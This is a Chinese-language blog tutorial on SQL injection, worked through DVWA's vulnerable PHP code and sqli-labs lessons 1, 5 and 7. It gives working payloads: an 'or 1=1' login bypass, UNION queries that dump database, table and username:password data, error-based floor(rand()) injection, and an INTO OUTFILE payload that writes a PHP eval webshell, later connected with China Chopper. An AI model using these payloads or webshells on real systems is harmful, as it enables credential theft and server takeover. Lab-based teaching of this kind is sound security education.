<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  

  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="sql注入基础#0x01sql语句基础：1.select语句 格式： select * from table（从table表中获取字段信息）  select * from table where (在满足where后的条件下查询字段信息) 2.insert语句 格式： insert into table(field1,field2) values(value1,value2) 3.update语句">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://yoursite.com/2019/10/22/新文档/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="sql注入基础#0x01sql语句基础：1.select语句 格式： select * from table（从table表中获取字段信息）  select * from table where (在满足where后的条件下查询字段信息) 2.insert语句 格式： insert into table(field1,field2) values(value1,value2) 3.update语句">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://yoursite.com/%E6%8D%95%E8%8E%B73.png">
<meta property="og:image" content="https://imgconvert.csdnimg.cn/aHR0cHM6Ly91cGxvYWQtaW1hZ2VzLmppYW5zaHUuaW8vdXBsb2FkX2ltYWdlcy85MjE2NjMxLWY1NTlmNDUyMmUyYjQ0ZjMucG5n?x-oss-process=image/format,png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191005170005919.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p5ZGJrMTIzNDU2,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191005181042833.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p5ZGJrMTIzNDU2,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191005190150598.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p5ZGJrMTIzNDU2,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2019100519070977.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p5ZGJrMTIzNDU2,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191005190933714.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p5ZGJrMTIzNDU2,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191009171549118.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p5ZGJrMTIzNDU2,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20191009172804632.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p5ZGJrMTIzNDU2,size_16,color_FFFFFF,t_70">
<meta property="og:updated_time" content="2019-10-22T06:53:45.765Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Hexo">
<meta name="twitter:description" content="sql注入基础#0x01sql语句基础：1.select语句 格式： select * from table（从table表中获取字段信息）  select * from table where (在满足where后的条件下查询字段信息) 2.insert语句 格式： insert into table(field1,field2) values(value1,value2) 3.update语句">
<meta name="twitter:image" content="http://yoursite.com/%E6%8D%95%E8%8E%B73.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
</head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-新文档" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2019/10/22/新文档/" class="article-date">
  <time datetime="2019-10-22T06:54:32.862Z" itemprop="datePublished">2019-10-22</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="sql注入基础"><a href="#sql注入基础" class="headerlink" title="sql注入基础"></a>sql注入基础</h1><h2 id="0x01sql语句基础："><a href="#0x01sql语句基础：" class="headerlink" title="#0x01sql语句基础："></a>#0x01sql语句基础：</h2><p><strong>1.select语句</strong></p>
<p>格式：</p>
<p>select * from table（从table表中获取字段信息）</p>
<p> select * from table where (在满足where后的条件下查询字段信息)</p>
<p><strong>2.insert语句</strong></p>
<p>格式：</p>
<p>insert into table(field1,field2) values(value1,value2)</p>
<p><strong>3.update语句</strong></p>
<p>格式：</p>
<p>update table1 set field1=value1 where</p>
<p><strong>4.delete语句</strong></p>
<p>格式：</p>
<p>delete from table1 where</p>
<p><strong>5.order子句</strong></p>
<p>ORDER BY 语句用于根据指定的列对结果集进行排序。</p>
<p>ORDER BY 语句默认按照升序对记录进行排序</p>
<p>如果想要把结果集按照倒序，则需要加上desc关键字</p>
<p>在sql注入中经常利用order by子句显示目标有多少字段</p>
<p><strong>6.and和or运算符</strong></p>
<p>AND 和 OR 可在 WHERE 子语句中把两个或多个条件结合起来。</p>
<p>如果第一个条件和第二个条件都成立，则 AND 运算符显示一条记录。</p>
<p>如果第一个条件和第二个条件中只要有一个成立，则 OR 运算符显示一条记录。</p>
<p>and 和 or的用处在万能密码中就可以体现出来：</p>
<pre><code>Select * from admin where username=’admin’ and password=’’ or 1=1</code></pre><p>在sql语句中，and的优先级是大于or的。username=’admin’的条件（1）为真，password=’’的条件（2）是假的<br>那么1 and 2=false，在与第三个条件 1=1（3）为真 进行 false or 3=true，结果就是真。 所以，有时候在执行sql注入，执行的语句后就会加上 or 1=1，目的就是利用sql and 和 or 运算符的优先级的差别，来达到用户想要的目的（语句为真，执行输入的语句）</p>
<h2 id="0x02什么是sql注入"><a href="#0x02什么是sql注入" class="headerlink" title="#0x02什么是sql注入?:"></a>#0x02什么是sql注入?:</h2><pre><code>所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。</code></pre><p>简单的说就是网页的后台没有对用户发送的语句（以参数的方式传递）进行过滤，使得用户发送的语句直接被sql解释器执行。</p>
<h2 id="0x03原理分析："><a href="#0x03原理分析：" class="headerlink" title="#0x03原理分析："></a>#0x03原理分析：</h2><p>我们可以利用DVWA平台去分析sql注入的原理，DVWA的平台搭建和sqli-labs和upload-labs类似，首先需要php运行环境。把下载的文件夹放到网站根目录（WWW）。</p>
<pre><code>&lt;?php

if( isset( $_REQUEST[ &apos;Submit&apos; ] ) ) {
    // Get input
    $id = $_REQUEST[ &apos;id&apos; ];

    // Check database
    $query  = &quot;SELECT first_name, last_name FROM users WHERE user_id = &apos;$id&apos;;&quot;;
    $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;],  $query ) or die( &apos;&lt;pre&gt;&apos; . ((is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_error($GLOBALS[&quot;___mysqli_ston&quot;]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . &apos;&lt;/pre&gt;&apos; );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row[&quot;first_name&quot;];
        $last  = $row[&quot;last_name&quot;];

        // Feedback for end user
        $html .= &quot;&lt;pre&gt;ID: {$id}&lt;br /&gt;First name: {$first}&lt;br /&gt;Surname: {$last}&lt;/pre&gt;&quot;;
    }

    mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]);
}

?&gt;</code></pre><p><img src="/%E6%8D%95%E8%8E%B73.png" alt></p>
<p>如果用户在userid文本框输入ID，输入的语句就会作为id参数的值通过GET(POST)方法提交到后台。通过sql解释器执行，并返回数据库查询的结果。也就是说，如果id传入的不只是一个数字，而是一条语句那么id的值就会被sql解释器执行。例如，用户令id=1’ and 1=1 order by 4 #,那么$query就会变成</p>
<pre><code>$query=&quot;SELECT first_name,last_name FROM users WHERE user_id=&apos;1&apos; and 1=1 order by 4#&quot;</code></pre><p>这样就能查询数据库信息了</p>
<h1 id="0x05sqli-labs"><a href="#0x05sqli-labs" class="headerlink" title="0x05sqli-labs"></a>0x05sqli-labs</h1><hr>
<p>sqli-labs是基于php环境的平台，使用前需要安装php集成环境（php+apache+mysql,部分关卡需要tomcat+java+mysql）。</p>
<p>sqli-labs下载地址：<a href="https://github.com/Audi-1/sqli-labs" target="_blank" rel="noopener">https://github.com/Audi-1/sqli-labs</a></p>
<p>这里还有一个sqli-labs原作者的教程：<a href="https://www.bilibili.com/video/av24783387?t=69" target="_blank" rel="noopener">https://www.bilibili.com/video/av24783387?t=69</a></p>
<p><strong>下面结合sqli-labs上的一些基础题目来介绍一些简单的sql注入方式。</strong></p>
<h1 id="0x06less01-联合查询"><a href="#0x06less01-联合查询" class="headerlink" title="0x06less01(联合查询)"></a>0x06less01(联合查询)</h1><hr>
<p>在了解题目要求之前，我们先来认识一下sql语句中union操作符。</p>
<p>union操作符的作用是合并多个select语句的结果集，但是使用union时，要保证union操作符内部的select语句要有相同的列</p>
<p>具体语法：</p>
<pre><code>select column1 from table1 union select column2 from table2</code></pre><p>注意：union操作符是不会返回相同的值。</p>
<p>union all</p>
<p>作用与union类似，都是合并多个select语句的结果集，但是可以返回重复的值。</p>
<p>题目要求：让用户上传一个参数’id’。</p>
<p><strong>1.判断注入点</strong></p>
<p>首先我们要找到注入点，判断注入点的常用方法之一就是在参数后加上一个单引号或双引号（因为sql语句添加引号会影响到sql语句的闭合，从而报错），如果报错，就可能存在注入点。当然，手工判断注入点的方法还有利用and运算符（and 1=1,and 1=2 ,and ‘1’=1）,利用特殊字符报错等等，在这里，就不详细介绍了。</p>
<p>通过尝试可以发现添加单引号后页面会有报错信息，说明页面存在注入点。</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly91cGxvYWQtaW1hZ2VzLmppYW5zaHUuaW8vdXBsb2FkX2ltYWdlcy85MjE2NjMxLWY1NTlmNDUyMmUyYjQ0ZjMucG5n?x-oss-process=image/format,png" alt></p>
<p>接下来就可以构造?id= 1’ ****语句实现注入了。</p>
<p><strong>2.使用 order by子句判断数据库的列数</strong></p>
<p>前面已经介绍了order by子句的作用，当order by子句后面的数字大于当前数据库的列数，语句就会出错。</p>
<p>输入id=1’ order by 4–+发现页面返回信息 “unknown columns ‘4’” 说明当前数据库的列数是小于4的。</p>
<p><img src="https://img-blog.csdnimg.cn/20191005170005919.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p5ZGJrMTIzNDU2,size_16,color_FFFFFF,t_70" alt></p>
<p>输入id=1’ order by 3–+发现页面返回了用户的name password 说明当前数据库的列数刚好等于3，下面就可以构造 select 1，2，3 ***** 来获取数据库的相应信息了。</p>
<p><strong>3.利用 information_schema库</strong></p>
<p>如果继续学习sql注入就会发现select语句经常会用到information_schema这个库来获取数据库的（表，列，字段）的信息。information_schema是mysql自带的数据库，只要用户安装了mysql，在安装的同时，information<br>_schema这个数据库就会安装到用户的系统中.</p>
<p>在MySQL中，把 information_schema 看作是一个数据库，确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权 限等。也就是说information_schema中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等。因此，在sql注入中就可以利用information_schema这个库获取其他数据库的信息.</p>
<p>SCHEMATA表:</p>
<p>SCHEMATA 表存储了 Mysql 数据库中所有库相关的信息，比如订单库、用户库这种不同的库。可以在mysql命令行中使用下述语句进行查看：</p>
<p>select * from information_schema.schemata;</p>
<p>TABLES表:<br>TABLES 表存储了 Mysql 数据库中表的信息。会记录这张表是属于哪个数据库(TABLE_SCHEMA)，是做什么的表(表注释)，多会创建的(CREATE_TIME)，有多少行数据(INDEX_LENGTH)等信息。</p>
<p>select* frominformation_schema.TABLES;</p>
<p>COLUMNS表:</p>
<p>COLUMNS 表存储了 Mysql 数据库中每张表中的列信息。会记录这列是属于哪张表(TABLE_NAME)、以及哪个库(TABLE_SCHEMA)、这列的数据类型是什么、列的注释(COLUMN_COMMENT)等信息。</p>
<p>select* frominformation_schema.COLUMNS<br>COLUMNS 表中字段 COLUMN_COMMENT 是关于列的注释信息，一般会标明这个列是什么字段，不同的数字代表什么含义(0代表什么、1代表什么)。</p>
<p><strong>4.开始注入</strong></p>
<p>获取数据库的名字:</p>
<pre><code>?id=-1&apos; union select 1,group_concat(schema_name),3 from information_schema.schemata--+//group_concat()函数是把一组中的非NULL字符串合并为一个字符串的函数</code></pre><p><img src="https://img-blog.csdnimg.cn/20191005181042833.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p5ZGJrMTIzNDU2,size_16,color_FFFFFF,t_70" alt></p>
<p>获取security数据库的表名:</p>
<pre><code>?id=-1&apos; union select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema=&apos;security&apos;--+</code></pre><p><img src="https://img-blog.csdnimg.cn/20191005190150598.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p5ZGJrMTIzNDU2,size_16,color_FFFFFF,t_70" alt></p>
<p>获取users表的列:</p>
<pre><code>?id=-1&apos; union select 1,group_concat(column_name),3 from infromation_schema.columns where  table_name=&apos;users&apos;--+</code></pre><p><img src="https://img-blog.csdnimg.cn/2019100519070977.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p5ZGJrMTIzNDU2,size_16,color_FFFFFF,t_70" alt></p>
<p>获取username ,password:</p>
<pre><code>?id=-1&apos; union select 1,group_concat(concat_ws(&apos;:&apos;,username,password)),3 from users--+//concat_ws函数是把一组非NULL字符串拼接为一个字符串，与concat函数相比主要不同是可以一次指定分隔符</code></pre><p><img src="https://img-blog.csdnimg.cn/20191005190933714.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p5ZGJrMTIzNDU2,size_16,color_FFFFFF,t_70" alt></p>
<h2 id="0x07less05报错注入"><a href="#0x07less05报错注入" class="headerlink" title="#0x07less05报错注入"></a>#0x07less05报错注入</h2><p>这关如果直接用联合查询的话,页面只会返回”You are in”,而不能返回数据库的信息。这时我们就可以尝试别的方法,比如时间注入,报错注入,布尔注入等等。在这一关可以使用报错注入来返回数据库的信息。</p>
<p><strong>1报错注入的原理:</strong></p>
<p>正常用户访问服务器发送id信息返回正确的id数据。报错注入是想办法构造语句，让错误信息中可以显示数据库的内容；如果能让错误信息中返回数据库中的内容，即实现SQL注入。</p>
<p><strong>2.利用group by和rand()的冲突直接报错注入</strong></p>
<p>group by的作用和order by的作用类似,都是对结果集排序(默认升序).而rand()是产生随机数的函数,类似于java的Math.random()。产生一个[0,1)区间的数.如rand()*2,则产生一个[0,2)区间的数。当rand() 和order by 在一起使用时，就会发生冲突。</p>
<p>由于rand和order+by的冲突，即rand()是不可以作为order by的条件字段,同理 也不可以为group by的条件字段。floor(rand(0)*2) 获取不确定又重复的值造成mysql的错误</p>
<p>rand和group by冲突的具体原因</p>
<p><strong>3.开始注入</strong></p>
<p>获取数据库的名字：</p>
<pre><code>?id=1&apos; union select 1,count(*),concat(&apos;:&apos;,(select database()),&apos;:&apos;,floor(rand()*2))a from information_schema.schemata group by a--+//</code></pre><p>其中concat函数的作用和之前group_concat()函数类似也是把一组非NULL字符串拼接为一个字符串。a是 as a的别名。然后返回值不能超过1行数据，所以如果里面的select获取的是多行数据时要加limit（查询多组用limit选择）</p>
<p>获取表：</p>
<pre><code>?id=1&apos; union select 1,count(*),concat(&apos;:&apos;,(select table_name from information_schema.tables where table_schema=&apos;security&apos; limit 0,1),&apos;:&apos;,floor(rand(0)*2))a from information_schema.tables  group by a--+</code></pre><p>获取列：</p>
<pre><code>?id=1&apos; union select 1,count(*),concat(&apos;:&apos;,(select column_name  from   information_schema.columns where table_name=&apos;users&apos;limit 0,1),&apos;:&apos;,floor(rand(0)*2))a from   information_schema.columns  group by a--+</code></pre><p>获取username， password:</p>
<pre><code>?id=1&apos; union select 1,count(*),concat(&apos;:&apos;,(select concat_ws(&apos;`&apos;,username,password) from users limit 0,1),&apos;:&apos;,floor(rand(0*2))) a from users group by a--+</code></pre><p>有关报错注入的方法还有很多，这里就不详细介绍了。</p>
<h2 id="0x08less07上传一句话木马"><a href="#0x08less07上传一句话木马" class="headerlink" title="#0x08less07上传一句话木马"></a>#0x08less07上传一句话木马</h2><p>先在id=1后加上单引号和双引号，页面都显示正常，但是在参数后加上注释，会报错，说明系统过滤注释符。并且sql语句id参数前后很有可能加了（），尝试了很多次发现构造:“id’ =1 ))”,可以使注释不被过滤。</p>
<p><img src="https://img-blog.csdnimg.cn/20191009171549118.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p5ZGJrMTIzNDU2,size_16,color_FFFFFF,t_70" alt><br>但是之后尝试 union,报错注入发现不能返回需要的信息（可以用布尔和时间盲注）。不过，本题提示利用file权限向服务器传入文件。那么，先看看是否能传入<br>构造语句：<br><a href="http://localhost/sqli-labs-master/Less-7/?id=1’" target="_blank" rel="noopener">http://localhost/sqli-labs-master/Less-7/?id=1’</a>)) and (select count(*) from mysql.user)&gt;0–<br>返回正常说明我们有这个权限.<br><img src="https://img-blog.csdnimg.cn/20191009172804632.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3p5ZGJrMTIzNDU2,size_16,color_FFFFFF,t_70" alt><br>然后把一句话木马发送到网页，构造语句：id=-1’)) union select 1,2,”&lt;?php</p>
<p>@eval($_POST[‘shell’])?&gt; into outfile “<strong><strong>* \test.php” (**</strong></strong>为网页的目录,test.php为上传的一句话木马文件）。<br>连上中国菜刀，发现能够连接成功，说明注入成功（网页根目录有一句话木马说明上传成功）。</p>
<h2 id="0x09"><a href="#0x09" class="headerlink" title="#0x09"></a>#0x09</h2>
      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2019/10/22/新文档/" data-id="ck3oj0oh90002lsv98usfvsz8" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2019/12/02/xss/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          (no title)
        
      </div>
    </a>
  
  
    <a href="/2019/06/04/hello-world/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Hello World</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/12/">December 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">October 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/06/">June 2019</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2019/12/02/xss/">(no title)</a>
          </li>
        
          <li>
            <a href="/2019/10/22/新文档/">(no title)</a>
          </li>
        
          <li>
            <a href="/2019/06/04/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2019 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



  </div>
</body>
</html>